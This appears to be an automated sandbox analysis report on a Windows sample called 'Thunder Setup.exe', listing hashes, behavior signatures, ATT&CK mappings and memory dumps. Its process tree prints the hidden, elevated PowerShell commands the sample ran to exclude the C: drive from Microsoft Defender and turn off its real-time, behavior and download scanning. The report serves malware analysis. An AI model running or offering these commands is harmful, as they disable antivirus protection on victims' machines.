8e3247579c4f432a90f1822f5151c6dc2836f7962d840a439fae8c6c8a76d294

Resubmissions

14/07/2024, 22:14

240714-15wd4sxcrg 8

14/07/2024, 16:06

240714-tj3gzaxdrn 8

Analysis

max time kernel
363s
max time network
342s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
14/07/2024, 22:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Thunder Setup.exe
Size

78KB
MD5

1eb797341e423c83060a36b92c720cc9
SHA1

380828212f0bb9a82d568491247a590a316e4351
SHA256

0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
SHA512

9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
SSDEEP

1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3372	Powershell.exe
2476	Powershell.exe
4328	Powershell.exe
3388	Powershell.exe
3372	Powershell.exe
228	powershell.exe
4492	powershell.exe
4468	powershell.exe
2752	powershell.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3372	Powershell.exe
2476	Powershell.exe
4328	Powershell.exe
3388	Powershell.exe
3372	Powershell.exe
3388	Powershell.exe
2476	Powershell.exe
4328	Powershell.exe
4468	powershell.exe
2752	powershell.exe
228	powershell.exe
4468	powershell.exe
228	powershell.exe
4492	powershell.exe
2752	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4328	Powershell.exe
Token: SeDebugPrivilege	3388	Powershell.exe
Token: SeDebugPrivilege	2476	Powershell.exe
Token: SeDebugPrivilege	3372	Powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1260	javaw.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 1260	3412	Thunder Setup.exe	82
PID 3412 wrote to memory of 1260	3412	Thunder Setup.exe	82
PID 3412 wrote to memory of 1260	3412	Thunder Setup.exe	82
PID 1260 wrote to memory of 3372	1260	javaw.exe	83
PID 1260 wrote to memory of 3372	1260	javaw.exe	83
PID 1260 wrote to memory of 3372	1260	javaw.exe	83
PID 1260 wrote to memory of 3388	1260	javaw.exe	84
PID 1260 wrote to memory of 3388	1260	javaw.exe	84
PID 1260 wrote to memory of 3388	1260	javaw.exe	84
PID 1260 wrote to memory of 4328	1260	javaw.exe	85
PID 1260 wrote to memory of 4328	1260	javaw.exe	85
PID 1260 wrote to memory of 4328	1260	javaw.exe	85
PID 1260 wrote to memory of 2476	1260	javaw.exe	86
PID 1260 wrote to memory of 2476	1260	javaw.exe	86
PID 1260 wrote to memory of 2476	1260	javaw.exe	86
PID 3372 wrote to memory of 228	3372	Powershell.exe	91
PID 3372 wrote to memory of 228	3372	Powershell.exe	91
PID 3372 wrote to memory of 228	3372	Powershell.exe	91
PID 2476 wrote to memory of 4468	2476	Powershell.exe	92
PID 2476 wrote to memory of 4468	2476	Powershell.exe	92
PID 2476 wrote to memory of 4468	2476	Powershell.exe	92
PID 3388 wrote to memory of 2752	3388	Powershell.exe	93
PID 3388 wrote to memory of 2752	3388	Powershell.exe	93
PID 3388 wrote to memory of 2752	3388	Powershell.exe	93
PID 4328 wrote to memory of 4492	4328	Powershell.exe	97
PID 4328 wrote to memory of 4492	4328	Powershell.exe	97
PID 4328 wrote to memory of 4492	4328	Powershell.exe	97

C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
  "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:228
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Powershell.exe.log

Filesize
1KB

MD5
e080d58e6387c9fd87434a502e1a902e

SHA1
ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

SHA256
6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

SHA512
6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
16314c04a37cc6d058ee56b5d84d4314

SHA1
84755304afdefc5f46eabd968118e0e3d58ca445

SHA256
2a9d5b2794ed96fd5d64251caa59246639e3e7396962799d301064f8bb6f2842

SHA512
f6a49d5cb852bf646d229634bba46c635a3a3447c881995f1001e4412b0c488da8627c7671b6ce7395266a99ecfdebb23c214ddc9629e4870c84fc2b3ec46204

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
52c9680010aca432dc3356400aa57c5d

SHA1
07bd979b1253bd8297c439f32fff951c9dbe843e

SHA256
0035e88cf9be129b61bd5317e12d7bbcccbb3a4a4153a2f84929ccec1dd7ba89

SHA512
a22e29fb4f8675761e3ffb711f636d3264baf6ef31c2bfa5fd3904d3839f5fefbe21650e3b14ce098b9cc4e158ec9146f177a3cdfebbc1d1c9d7401595290259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e6b946e8259524ea78190238b9b8d836

SHA1
8f7767914c5290c31017f267be36661481b4d67d

SHA256
1567aff186a93c9bd2baf1e5c8b96f3df14dac44289533a0754110d569019e24

SHA512
88b3ccd4b010a8823e77763c6724dab9ea3c453a6b3f0249842d08e4b342f7353a61384fd9ec6dd50c78d9161500d99685985031f2a16519ac3ea8f04ce14b4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b934a085c6e1f7b4c8cd1a67bd393152

SHA1
e06404354bb05aaac04137a8412b158ef0da4192

SHA256
f42c303b5ffb4da3fadecae6fb4c7bdb2f31b6adeb9552a1bb63cd15ce74c14a

SHA512
a513203f187b43236278c5ecbbf809e6c56e97ff1e9f541775aef5f597aca133586a5ff93776e9b19b0d02d47cf9df3706e3c1e5a650003915a32074324cd596

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lflsi0ii.u2q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1260-123-0x0000000002B10000-0x0000000002B18000-memory.dmp

Filesize
32KB

Download
memory/1260-162-0x0000000002B08000-0x0000000002B10000-memory.dmp

Filesize
32KB

Download
memory/1260-34-0x0000000002A58000-0x0000000002A60000-memory.dmp

Filesize
32KB

Download
memory/1260-37-0x0000000002A60000-0x0000000002A68000-memory.dmp

Filesize
32KB

Download
memory/1260-38-0x0000000002A68000-0x0000000002A70000-memory.dmp

Filesize
32KB

Download
memory/1260-40-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1260-41-0x0000000002A70000-0x0000000002A78000-memory.dmp

Filesize
32KB

Download
memory/1260-43-0x0000000002A78000-0x0000000002A80000-memory.dmp

Filesize
32KB

Download
memory/1260-45-0x0000000002A80000-0x0000000002A88000-memory.dmp

Filesize
32KB

Download
memory/1260-51-0x0000000002A88000-0x0000000002A90000-memory.dmp

Filesize
32KB

Download
memory/1260-50-0x00000000029B0000-0x00000000029D8000-memory.dmp

Filesize
160KB

Download
memory/1260-54-0x00000000029F8000-0x0000000002A00000-memory.dmp

Filesize
32KB

Download
memory/1260-55-0x0000000002A90000-0x0000000002A98000-memory.dmp

Filesize
32KB

Download
memory/1260-58-0x0000000002A98000-0x0000000002AA0000-memory.dmp

Filesize
32KB

Download
memory/1260-57-0x0000000002A00000-0x0000000002A08000-memory.dmp

Filesize
32KB

Download
memory/1260-63-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

Filesize
32KB

Download
memory/1260-62-0x00000000029E8000-0x00000000029F0000-memory.dmp

Filesize
32KB

Download
memory/1260-61-0x0000000002A50000-0x0000000002A58000-memory.dmp

Filesize
32KB

Download
memory/1260-67-0x0000000002AA8000-0x0000000002AB0000-memory.dmp

Filesize
32KB

Download
memory/1260-66-0x0000000002A58000-0x0000000002A60000-memory.dmp

Filesize
32KB

Download
memory/1260-71-0x0000000002AB0000-0x0000000002AB8000-memory.dmp

Filesize
32KB

Download
memory/1260-70-0x0000000002A60000-0x0000000002A68000-memory.dmp

Filesize
32KB

Download
memory/1260-75-0x0000000002AB8000-0x0000000002AC0000-memory.dmp

Filesize
32KB

Download
memory/1260-74-0x0000000002A68000-0x0000000002A70000-memory.dmp

Filesize
32KB

Download
memory/1260-78-0x0000000002AC0000-0x0000000002AC8000-memory.dmp

Filesize
32KB

Download
memory/1260-77-0x0000000002A70000-0x0000000002A78000-memory.dmp

Filesize
32KB

Download
memory/1260-84-0x0000000002A78000-0x0000000002A80000-memory.dmp

Filesize
32KB

Download
memory/1260-85-0x0000000002AC8000-0x0000000002AD0000-memory.dmp

Filesize
32KB

Download
memory/1260-90-0x0000000002AD0000-0x0000000002AD8000-memory.dmp

Filesize
32KB

Download
memory/1260-89-0x0000000002A80000-0x0000000002A88000-memory.dmp

Filesize
32KB

Download
memory/1260-94-0x0000000002AD8000-0x0000000002AE0000-memory.dmp

Filesize
32KB

Download
memory/1260-93-0x0000000002A88000-0x0000000002A90000-memory.dmp

Filesize
32KB

Download
memory/1260-97-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/1260-96-0x0000000002A90000-0x0000000002A98000-memory.dmp

Filesize
32KB

Download
memory/1260-100-0x0000000002AE8000-0x0000000002AF0000-memory.dmp

Filesize
32KB

Download
memory/1260-99-0x0000000002A98000-0x0000000002AA0000-memory.dmp

Filesize
32KB

Download
memory/1260-104-0x0000000002AF0000-0x0000000002AF8000-memory.dmp

Filesize
32KB

Download
memory/1260-103-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

Filesize
32KB

Download
memory/1260-107-0x0000000002AF8000-0x0000000002B00000-memory.dmp

Filesize
32KB

Download
memory/1260-106-0x0000000002AA8000-0x0000000002AB0000-memory.dmp

Filesize
32KB

Download
memory/1260-111-0x0000000002B00000-0x0000000002B08000-memory.dmp

Filesize
32KB

Download
memory/1260-110-0x0000000002AB0000-0x0000000002AB8000-memory.dmp

Filesize
32KB

Download
memory/1260-113-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1260-118-0x0000000002B08000-0x0000000002B10000-memory.dmp

Filesize
32KB

Download
memory/1260-117-0x0000000002AB8000-0x0000000002AC0000-memory.dmp

Filesize
32KB

Download
memory/1260-120-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1260-30-0x0000000002A48000-0x0000000002A50000-memory.dmp

Filesize
32KB

Download
memory/1260-122-0x0000000002AC0000-0x0000000002AC8000-memory.dmp

Filesize
32KB

Download
memory/1260-126-0x0000000002B18000-0x0000000002B20000-memory.dmp

Filesize
32KB

Download
memory/1260-125-0x0000000002AC8000-0x0000000002AD0000-memory.dmp

Filesize
32KB

Download
memory/1260-29-0x0000000002A50000-0x0000000002A58000-memory.dmp

Filesize
32KB

Download
memory/1260-6-0x00000000029B0000-0x00000000029D8000-memory.dmp

Filesize
160KB

Download
memory/1260-132-0x0000000002B28000-0x0000000002B30000-memory.dmp

Filesize
32KB

Download
memory/1260-140-0x0000000002B38000-0x0000000002B40000-memory.dmp

Filesize
32KB

Download
memory/1260-139-0x0000000002B30000-0x0000000002B38000-memory.dmp

Filesize
32KB

Download
memory/1260-138-0x0000000002AD8000-0x0000000002AE0000-memory.dmp

Filesize
32KB

Download
memory/1260-143-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/1260-144-0x0000000002B40000-0x0000000002B48000-memory.dmp

Filesize
32KB

Download
memory/1260-148-0x0000000002B48000-0x0000000002B50000-memory.dmp

Filesize
32KB

Download
memory/1260-147-0x0000000002AE8000-0x0000000002AF0000-memory.dmp

Filesize
32KB

Download
memory/1260-150-0x0000000002B50000-0x0000000002B58000-memory.dmp

Filesize
32KB

Download
memory/1260-149-0x0000000002AF0000-0x0000000002AF8000-memory.dmp

Filesize
32KB

Download
memory/1260-155-0x0000000002B60000-0x0000000002B68000-memory.dmp

Filesize
32KB

Download
memory/1260-154-0x0000000002B58000-0x0000000002B60000-memory.dmp

Filesize
32KB

Download
memory/1260-153-0x0000000002AF8000-0x0000000002B00000-memory.dmp

Filesize
32KB

Download
memory/1260-159-0x0000000002B68000-0x0000000002B70000-memory.dmp

Filesize
32KB

Download
memory/1260-158-0x0000000002B00000-0x0000000002B08000-memory.dmp

Filesize
32KB

Download
memory/1260-164-0x0000000002B78000-0x0000000002B80000-memory.dmp

Filesize
32KB

Download
memory/1260-163-0x0000000002B70000-0x0000000002B78000-memory.dmp

Filesize
32KB

Download
memory/1260-131-0x0000000002B20000-0x0000000002B28000-memory.dmp

Filesize
32KB

Download
memory/1260-167-0x0000000002B10000-0x0000000002B18000-memory.dmp

Filesize
32KB

Download
memory/1260-168-0x0000000002B80000-0x0000000002B88000-memory.dmp

Filesize
32KB

Download
memory/1260-171-0x0000000002B88000-0x0000000002B90000-memory.dmp

Filesize
32KB

Download
memory/1260-170-0x0000000002B18000-0x0000000002B20000-memory.dmp

Filesize
32KB

Download
memory/1260-174-0x0000000002B20000-0x0000000002B28000-memory.dmp

Filesize
32KB

Download
memory/1260-176-0x0000000002B90000-0x0000000002B98000-memory.dmp

Filesize
32KB

Download
memory/1260-175-0x0000000002B28000-0x0000000002B30000-memory.dmp

Filesize
32KB

Download
memory/1260-177-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1260-181-0x0000000002B38000-0x0000000002B40000-memory.dmp

Filesize
32KB

Download
memory/1260-182-0x0000000002B98000-0x0000000002BA0000-memory.dmp

Filesize
32KB

Download
memory/1260-180-0x0000000002B30000-0x0000000002B38000-memory.dmp

Filesize
32KB

Download
memory/1260-12-0x00000000029F8000-0x0000000002A00000-memory.dmp

Filesize
32KB

Download
memory/1260-13-0x0000000002A00000-0x0000000002A08000-memory.dmp

Filesize
32KB

Download
memory/1260-32-0x00000000029F0000-0x00000000029F8000-memory.dmp

Filesize
32KB

Download
memory/1260-31-0x00000000029E8000-0x00000000029F0000-memory.dmp

Filesize
32KB

Download
memory/1260-238-0x0000000002B40000-0x0000000002B48000-memory.dmp

Filesize
32KB

Download
memory/1260-130-0x0000000002AD0000-0x0000000002AD8000-memory.dmp

Filesize
32KB

Download
memory/2476-186-0x0000000002A60000-0x0000000002A96000-memory.dmp

Filesize
216KB

Download
memory/3372-225-0x0000000006830000-0x000000000684E000-memory.dmp

Filesize
120KB

Download
memory/3388-226-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/3388-229-0x00000000064C0000-0x00000000064E2000-memory.dmp

Filesize
136KB

Download
memory/3388-230-0x0000000007850000-0x0000000007DF6000-memory.dmp

Filesize
5.6MB

Download
memory/3388-228-0x0000000006470000-0x000000000648A000-memory.dmp

Filesize
104KB

Download
memory/3388-227-0x0000000007200000-0x0000000007296000-memory.dmp

Filesize
600KB

Download
memory/3412-0-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4328-189-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/4328-191-0x0000000006240000-0x0000000006597000-memory.dmp

Filesize
3.3MB

Download
memory/4328-188-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/4328-187-0x0000000005B10000-0x000000000613A000-memory.dmp

Filesize
6.2MB

Download
memory/4328-190-0x0000000005990000-0x00000000059F6000-memory.dmp

Filesize
408KB

Download
memory/4468-274-0x0000000007400000-0x0000000007434000-memory.dmp

Filesize
208KB

Download